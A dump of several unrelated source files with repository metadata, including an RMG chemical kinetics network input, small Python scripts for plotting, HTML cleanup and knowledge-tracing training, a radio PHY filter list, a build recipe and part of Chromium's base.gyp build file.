thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.8328,0.000224446,4.68033e-06,-6.04743e-09,2.59009e-12,45920.8,1.40666], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.16229,0.00281798,-7.56235e-07,5.05446e-11,5.65236e-15,46099.1,4.77656], Tmin=(1000,'K'), Tmax=(3000,'K'))], Tmin=(200,'K'), Tmax=(3000,'K'), E0=(381.563,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29226.7,5.11107], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29226.7,5.11107], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CH3(17)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = '[CH2][O](167)',
structure = SMILES('[CH2][O]'),
E0 = (192.903,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (30.026,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.88409,-0.00363885,3.28543e-05,-4.13611e-08,1.59631e-11,23210.8,7.47983], Tmin=(100,'K'), Tmax=(933.06,'K')), NASAPolynomial(coeffs=[6.69335,0.000289989,8.61416e-07,-1.56351e-10,7.33778e-15,21991.3,-9.6043], Tmin=(933.06,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(192.903,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(128.874,'J/(mol*K)'), comment="""Thermo library: Klippenstein_Glarborg2016 + radical(H3COJ) + radical(CsJOH)"""),
)
species(
label = 'HCOH(T)(285)',
structure = SMILES('[CH]O'),
E0 = (205.906,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1277.5,1000,403.876,3308.82],'cm^-1')),
HinderedRotor(inertia=(0.0103144,'amu*angstrom^2'), symmetry=1, barrier=(22.7121,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (30.026,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.75938,0.0029613,8.90411e-06,-1.35016e-08,5.39816e-12,24775.6,6.76286], Tmin=(100,'K'), Tmax=(940.429,'K')), NASAPolynomial(coeffs=[5.09112,0.00321239,-9.31686e-07,1.59615e-10,-1.15729e-14,24263.5,-0.971], Tmin=(940.429,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(205.906,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(78.9875,'J/(mol*K)'), label="""HCOH(T)""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (136.795,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (109.772,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (404.696,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (409.935,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (417.698,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (111.178,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (404.696,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (379.192,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction5',
reactants = ['CH2OH(24)'],
products = ['H(3)', 'CH2O(15)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(7.37e+10,'s^-1'), n=0.811, Ea=(39558.7,'cal/mol'), T0=(1,'K'), comment="""Kinetics taken from the arrheniusHigh attribute of a Troe/Lindemann exprssion. Originally from reaction library Klippenstein_Glarborg2016"""),
)
reaction(
label = 'reaction2',
reactants = ['CH2OH(24)'],
products = ['CH3O(25)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(25600,'s^-1'), n=2.36, Ea=(138.49,'kJ/mol'), T0=(1,'K'), Tmin=(600,'K'), Tmax=(2000,'K'), comment="""Matched reaction 345 CH3O <=> CH3O-2 in intra_H_migration/training
This reaction matched rate rule [R2H_S;O_rad_out;Cs_H_out_2H]
family: intra_H_migration"""),
)
reaction(
label = 'reaction6',
reactants = ['H(3)', '[CH2][O](167)'],
products = ['CH2OH(24)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(4.34601e+06,'m^3/(mol*s)'), n=0.278532, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction7',
reactants = ['OH(5)', 'CH2(19)'],
products = ['CH2OH(24)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(1355.7,'m^3/(mol*s)'), n=1.40819, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [O_rad;Birad] for rate rule [O_pri_rad;Birad]
Euclidian distance = 1.0
family: Birad_R_Recombination
Ea raised from -12.0 to 0 kJ/mol."""),
)
reaction(
label = 'reaction5',
reactants = ['H(3)', 'HCOH(T)(285)'],
products = ['CH2OH(24)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction1',
reactants = ['CH3O(25)'],
products = ['H(3)', 'CH2O(15)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(1.13e+10,'s^-1'), n=1.21, Ea=(24068.8,'cal/mol'), T0=(1,'K'), comment="""Kinetics taken from the arrheniusHigh attribute of a Troe/Lindemann exprssion. Originally from reaction library Klippenstein_Glarborg2016"""),
)
reaction(
label = 'reaction3',
reactants = ['H(3)', '[CH2][O](167)'],
products = ['CH3O(25)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(4.34601e+06,'m^3/(mol*s)'), n=0.278532, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction4',
reactants = ['O(4)', 'CH3(17)'],
products = ['CH3O(25)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_methyl;O_birad]
Euclidian distance = 2.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
network(
label = '80',
isomers = [
'CH2OH(24)',
'CH3O(25)',
],
reactants = [
('H(3)', 'CH2O(15)'),
('OH(5)', 'CH2(19)'),
('O(4)', 'CH3(17)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '80',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"qin.she@husky.neu.edu"
] | qin.she@husky.neu.edu |
9ebae106d0ffd798ae05342b8bf2684406293bbf | 33836016ea99776d31f7ad8f2140c39f7b43b5fe | /fip_collab/2016_01_28_gsh_database_codes/plot_slice_compare_uniaxial2cyclic.py | d45d2d052bb44de92754eebaa18e75b9cd20c0cf | [] | no_license | earthexploration/MKS-Experimentation | 92a2aea83e041bfe741048d662d28ff593077551 | 9b9ff3b468767b235e7c4884b0ed56c127328a5f | refs/heads/master | 2023-03-17T23:11:11.313693 | 2017-04-24T19:24:35 | 2017-04-24T19:24:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import h5py
f = h5py.File('slice.hdf5', 'r')
slc_uni = f.get('slice_uni')[...].real
slc_cyc = f.get('slice_cyc')[...].real
par = f.get('parameters')[...]
f.close()
th = np.round(par[0]*180./np.pi, 2)
phi2 = np.round(par[1]*180./np.pi, 0)
en = np.round(par[2], 4)
fig = plt.figure(num=1, figsize=[14, 8])
ax = fig.add_subplot(111, projection='3d')
ax.scatter(slc_uni[:, 1], slc_uni[:, 2], slc_uni[:, 5], c='b')
ax.scatter(slc_cyc[:, 1], slc_cyc[:, 2], slc_cyc[:, 5], c='r')
title_text = "theta = %s, phi2 = %s, en = %s" % (th, phi2, en)
ax.set_title(title_text)
ax.set_xlabel('phi1')
ax.set_ylabel('Phi')
ax.set_zlabel('FIP')
plt.show()
| [
"noahhpaulson@gmail.com"
] | noahhpaulson@gmail.com |
6f03b5b578c7f4027dd73f0fbcbb4198d4c5e38f | 15b3b60252af3e5ebd8be4a9fbcccc96469acaad | /pre_clean.py | 30bfe2e18f4c68a8065eef0a6895f5ac0df7ba16 | [] | no_license | yingl/jkb | b6d50cd5d5ba64798a28f6948f1490f334f52b97 | fdf68dee5fbe5a9cfbf2a41af78d2f2ec16a459c | refs/heads/master | 2020-03-28T11:59:47.752625 | 2020-01-23T06:49:46 | 2020-01-23T06:49:46 | 148,262,569 | 10 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,231 | py | import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-fi',
'--filein',
type=str)
parser.add_argument('-fo',
'--fileout',
type=str)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
fi = args.filein
fo = args.fileout
with open(fi, 'r', encoding='utf-8') as fi:
text = fi.read()
text = text.replace('<h2>', '## ')
text = text.replace('</h2>', '')
text = text.replace('<h3>', '### ')
text = text.replace('</h3>', '')
text = text.replace('<strong>', '<b>')
text = text.replace('</strong>', '</b>')
text = text.replace('<p>', '')
text = text.replace('</p>', '')
text = text.replace('<ul>', '')
text = text.replace('</ul>', '')
text = text.replace('<ol>', '')
text = text.replace('</ol>', '')
text = text.replace('<li>', '')
text = text.replace('</li>', '')
text = text.replace('<center>', '')
text = text.replace('</center>', '')
with open(fo, 'w+', encoding='utf-8') as fo:
fo.write(text) | [
"linying_43151@163.com"
] | linying_43151@163.com |
517a5b458cf820892048f7df658197d34e5aadd7 | c1869b7106a4651ecc0f0f53b82d5f11021896e3 | /examples/DKVMN/DKVMN.py | 22aaa5b5608ca405710ad4a60415fbe0a2e2f8ae | [
"MIT"
] | permissive | bigdata-ustc/XKT | 6efd7ff5b09c22ed9099f5b9b614edceff1cada0 | b3ac07541b92001b62d7cff4e8fe7e5a69c5c93c | refs/heads/master | 2021-09-22T19:22:25.563651 | 2021-09-16T02:56:10 | 2021-09-16T02:56:10 | 194,855,614 | 18 | 9 | MIT | 2021-09-16T02:56:11 | 2019-07-02T12:06:12 | Python | UTF-8 | Python | false | false | 699 | py | # coding: utf-8
# 2021/5/26 @ tongshiwei
import mxnet as mx
from XKT.DKVMN import etl
from XKT import DKVMN
batch_size = 32
train = etl("../../data/a0910c/train.json", batch_size=batch_size)
valid = etl("../../data/a0910c/valid.json", batch_size=batch_size)
test = etl("../../data/a0910c/test.json", batch_size=batch_size)
model = DKVMN(
hyper_params=dict(
ku_num=146,
key_embedding_dim=10,
value_embedding_dim=10,
key_memory_size=20,
hidden_num=100
)
)
model.train(train, valid, end_epoch=2)
model.save("dkvmn")
model = DKVMN.from_pretrained("dkvmn")
print(model.eval(test))
inputs = mx.nd.ones((2, 3))
outputs, _ = model(inputs)
print(outputs) | [
"tongsw@mail.ustc.edu.cn"
] | tongsw@mail.ustc.edu.cn |
a5669df662c5cbc0c978c08431dfe48e19ea5151 | bf4178e73f0f83781be6784d7587cb34a38d6edd | /platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/ocelot/filters/phy_filters.py | e49ca3348ff7ba8253f8aecb5959917a02921b04 | [] | no_license | kolbertv/ZigbeeSiliconV3 | 80d70515e93be1413c24cdcb3485f50c65a1564b | ab0bd8d4bb6c1048adef81d0e66d96006c2fabd9 | refs/heads/master | 2023-01-02T07:18:01.393003 | 2020-10-25T15:33:08 | 2020-10-25T15:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,896 | py | """
Lynx specific filters
"""
from pyradioconfig.calculator_model_framework.interfaces.iphy_filter import IPhyFilter
class PhyFilters(IPhyFilter):
#Studio black list (files removed before Studio distribution)
customer_phy_groups = [
'Phys_Internal_Base_Customer_Aclara',
'Phys_Internal_Base_Customer_Acuity',
'Phys_Internal_Base_Customer_Chamberlain',
'Phys_Internal_Base_Customer_Essence',
'Phys_Internal_Base_Customer_HoneywellEnergyAxis',
'Phys_Internal_Base_Customer_Lutron',
'Phys_Internal_Base_Customer_Sigfox',
'Phys_Internal_Base_Experimental',
'Phys_Internal_Base_Utility',
'Phys_Internal_Base_ValOnly',
'Phys_Internal_Connect',
'Phys_Internal_Longrange',
'Phys_Internal_RAIL_Base_Standard_BLE',
'Phys_Internal_RAIL_Base_Standard_IEEE802154',
'Phys_RAIL_Base_Standard_BLE',
'Phys_RAIL_Base_Standard_IEEE802154',
'Phys_RAIL_Base_Standard_IEEE802154GB',
'Phys_RAIL_Base_Standard_ZWave',
]
#Studio white list (these PHYs show in Studio as proprietary starting points)
simplicity_studio_phy_groups = ['Phys_Studio_Base', 'Phys_Studio_Base_Standard_SUNFSK', 'Phys_Studio_Connect',
'Phys_Studio_LongRange', 'Phys_Studio_MBus','Phys_Studio_WiSUN']
# Special designation for simulation PHYs
sim_tests_phy_groups = []
# Special designation for non-functional PHYs
non_functional_phy_groups = [] | [
"1048267279@qq.com"
] | 1048267279@qq.com |
69d80edf9f62e78f34fc9b40f7ed035eb1dba0cd | 1adc05008f0caa9a81cc4fc3a737fcbcebb68995 | /hardhat/recipes/notmuch.py | 2d64141806c5209a2c04e5546647640e733fe6b2 | [
"MIT",
"BSD-3-Clause"
] | permissive | stangelandcl/hardhat | 4aa995518697d19b179c64751108963fa656cfca | 1ad0c5dec16728c0243023acb9594f435ef18f9c | refs/heads/master | 2021-01-11T17:19:41.988477 | 2019-03-22T22:18:44 | 2019-03-22T22:18:52 | 79,742,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | from .base import GnuRecipe
class NotMuchRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(NotMuchRecipe, self).__init__(*args, **kwargs)
self.sha256 = 'b4bf09ec9b7b64180704faa26d66cad5' \
'f911a5a00ef812da34cb02c3f8872831'
self.name = 'notmuch'
self.version = '0.25.1'
self.version_regex = r'(?P<version>\d+\.\d+\.\d+)'
self.version_url = 'https://notmuchmail.org/releases'
self.depends = ['autotools', 'gmime', 'python3-sphinx',
'talloc', 'xapian']
self.url = 'https://notmuchmail.org/releases/notmuch-$version.tar.gz'
self.configure_args += ['--without-ruby']
# needed to make sphinx test pass to install manpages
self.environment['PYTHON'] = 'python3'
| [
"clayton.stangeland@gmail.com"
] | clayton.stangeland@gmail.com |
6eb155a4ac3b2b0359f9044b2ae585107b9319e7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03149/s623046352.py | 95d3c7f2b6e2b5f32f1a52e47749d1a99cffe089 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | print("YES" if set(map(int,input().split()))=={1,9,7,4} else "NO") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
a74c31405dbceed57f5ce2704ff493613ace4432 | ceed8ee18ab314b40b3e5b170dceb9adedc39b1e | /android/external/libchrome/base/base.gyp | dc484f4a4a62b0d2aa9804b29ba98c235dc7f7a3 | [
"BSD-3-Clause"
] | permissive | BPI-SINOVOIP/BPI-H3-New-Android7 | c9906db06010ed6b86df53afb6e25f506ad3917c | 111cb59a0770d080de7b30eb8b6398a545497080 | refs/heads/master | 2023-02-28T20:15:21.191551 | 2018-10-08T06:51:44 | 2018-10-08T06:51:44 | 132,708,249 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 60,092 | gyp | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'includes': [
'../build/win_precompile.gypi',
'base.gypi',
],
'targets': [
{
'target_name': 'base',
'type': '<(component)',
'toolsets': ['host', 'target'],
'variables': {
'base_target': 1,
'enable_wexit_time_destructors': 1,
'optimize': 'max',
},
'dependencies': [
'base_debugging_flags#target',
'base_static',
'../testing/gtest.gyp:gtest_prod',
'../third_party/modp_b64/modp_b64.gyp:modp_b64',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
],
# TODO(gregoryd): direct_dependent_settings should be shared with the
# 64-bit target, but it doesn't work due to a bug in gyp
'direct_dependent_settings': {
'include_dirs': [
'..',
],
},
'conditions': [
['desktop_linux == 1 or chromeos == 1', {
'conditions': [
['chromeos==1', {
'sources/': [ ['include', '_chromeos\\.cc$'] ]
}],
],
'dependencies': [
'symbolize',
'xdg_mime',
],
'defines': [
'USE_SYMBOLIZE',
],
}, { # desktop_linux == 0 and chromeos == 0
'sources/': [
['exclude', '/xdg_user_dirs/'],
['exclude', '_nss\\.cc$'],
],
}],
['use_glib==1', {
'dependencies': [
'../build/linux/system.gyp:glib',
],
'export_dependent_settings': [
'../build/linux/system.gyp:glib',
],
}],
['OS == "android" and _toolset == "host"', {
# Always build base as a static_library for host toolset, even if
# we're doing a component build. Specifically, we only care about the
# target toolset using components since that's what developers are
# focusing on. In theory we should do this more generally for all
# targets when building for host, but getting the gyp magic
# per-toolset for the "component" variable is hard, and we really only
# need base on host.
'type': 'static_library',
# Base for host support is the minimum required to run the
# ssl false start blacklist tool. It requires further changes
# to generically support host builds (and tests).
# Note: when building for host, gyp has OS == "android",
# hence the *_android.cc files are included but the actual code
# doesn't have OS_ANDROID / ANDROID defined.
'conditions': [
['host_os == "mac"', {
'sources/': [
['exclude', '^native_library_linux\\.cc$'],
['exclude', '^process_util_linux\\.cc$'],
['exclude', '^sys_info_linux\\.cc$'],
['exclude', '^sys_string_conversions_linux\\.cc$'],
['exclude', '^worker_pool_linux\\.cc$'],
],
}],
],
}],
['OS == "android" and _toolset == "target"', {
'dependencies': [
'base_java',
'base_jni_headers',
'../build/android/ndk.gyp:cpu_features',
'../third_party/ashmem/ashmem.gyp:ashmem',
],
'link_settings': {
'libraries': [
'-llog',
],
},
'sources!': [
'debug/stack_trace_posix.cc',
],
}],
['os_bsd==1', {
'include_dirs': [
'/usr/local/include',
],
'link_settings': {
'libraries': [
'-L/usr/local/lib -lexecinfo',
],
},
}],
['OS == "linux"', {
'link_settings': {
'libraries': [
# We need rt for clock_gettime().
'-lrt',
# For 'native_library_linux.cc'
'-ldl',
],
},
'conditions': [
['use_allocator!="tcmalloc"', {
'defines': [
'NO_TCMALLOC',
],
'direct_dependent_settings': {
'defines': [
'NO_TCMALLOC',
],
},
}],
],
}],
['OS == "win"', {
# Specify delayload for base.dll.
'msvs_settings': {
'VCLinkerTool': {
'DelayLoadDLLs': [
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
],
},
},
# Specify delayload for components that link with base.lib.
'all_dependent_settings': {
'msvs_settings': {
'VCLinkerTool': {
'DelayLoadDLLs': [
'cfgmgr32.dll',
'powrprof.dll',
'setupapi.dll',
],
'AdditionalDependencies': [
'cfgmgr32.lib',
'powrprof.lib',
'setupapi.lib',
],
},
},
},
'copies': [
{
'destination': '<(PRODUCT_DIR)/',
'files': [
'../build/win/dbghelp_xp/dbghelp.dll',
],
},
],
'dependencies': [
'trace_event/etw_manifest/etw_manifest.gyp:etw_manifest',
],
}],
['OS == "mac" or (OS == "ios" and _toolset == "host")', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/AppKit.framework',
'$(SDKROOT)/System/Library/Frameworks/ApplicationServices.framework',
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/IOKit.framework',
'$(SDKROOT)/System/Library/Frameworks/Security.framework',
],
},
}],
['OS == "ios" and _toolset != "host"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreFoundation.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreText.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
],
},
}],
['OS != "win" and (OS != "ios" or _toolset == "host")', {
'dependencies': ['third_party/libevent/libevent.gyp:libevent'],
},],
['component=="shared_library"', {
'conditions': [
['OS=="win"', {
'sources!': [
'debug/debug_on_start_win.cc',
],
}],
],
}],
['OS=="ios"', {
'sources!': [
'sync_socket.h',
'sync_socket_posix.cc',
]
}],
],
'sources': [
'auto_reset.h',
'linux_util.cc',
'linux_util.h',
'message_loop/message_pump_android.cc',
'message_loop/message_pump_android.h',
'message_loop/message_pump_glib.cc',
'message_loop/message_pump_glib.h',
'message_loop/message_pump_io_ios.cc',
'message_loop/message_pump_io_ios.h',
'message_loop/message_pump_libevent.cc',
'message_loop/message_pump_libevent.h',
'message_loop/message_pump_mac.h',
'message_loop/message_pump_mac.mm',
'metrics/field_trial.cc',
'metrics/field_trial.h',
'posix/file_descriptor_shuffle.cc',
'posix/file_descriptor_shuffle.h',
'sync_socket.h',
'sync_socket_posix.cc',
'sync_socket_win.cc',
'third_party/xdg_user_dirs/xdg_user_dir_lookup.cc',
'third_party/xdg_user_dirs/xdg_user_dir_lookup.h',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
{
'target_name': 'base_i18n',
'type': '<(component)',
'variables': {
'enable_wexit_time_destructors': 1,
'optimize': 'max',
'base_i18n_target': 1,
},
'dependencies': [
'base',
'third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../third_party/icu/icu.gyp:icui18n',
'../third_party/icu/icu.gyp:icuuc',
],
'conditions': [
['OS == "win"', {
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [
4267,
],
}],
['icu_use_data_file_flag==1', {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_FILE'],
}, { # else icu_use_data_file_flag !=1
'conditions': [
['OS=="win"', {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_SHARED'],
}, {
'defines': ['ICU_UTIL_DATA_IMPL=ICU_UTIL_DATA_STATIC'],
}],
],
}],
['OS == "ios"', {
'toolsets': ['host', 'target'],
}],
],
'export_dependent_settings': [
'base',
'../third_party/icu/icu.gyp:icuuc',
'../third_party/icu/icu.gyp:icui18n',
],
'includes': [
'../build/android/increase_size_for_speed.gypi',
],
},
{
'target_name': 'base_message_loop_tests',
'type': 'static_library',
'dependencies': [
'base',
'../testing/gtest.gyp:gtest',
],
'sources': [
'message_loop/message_loop_test.cc',
'message_loop/message_loop_test.h',
],
},
{
'target_name': 'base_prefs',
'type': '<(component)',
'variables': {
'enable_wexit_time_destructors': 1,
'optimize': 'max',
},
'dependencies': [
'base',
],
'export_dependent_settings': [
'base',
],
'defines': [
'BASE_PREFS_IMPLEMENTATION',
],
'sources': [
'prefs/base_prefs_export.h',
'prefs/default_pref_store.cc',
'prefs/default_pref_store.h',
'prefs/json_pref_store.cc',
'prefs/json_pref_store.h',
'prefs/overlay_user_pref_store.cc',
'prefs/overlay_user_pref_store.h',
'prefs/persistent_pref_store.h',
'prefs/pref_change_registrar.cc',
'prefs/pref_change_registrar.h',
'prefs/pref_filter.h',
'prefs/pref_member.cc',
'prefs/pref_member.h',
'prefs/pref_notifier.h',
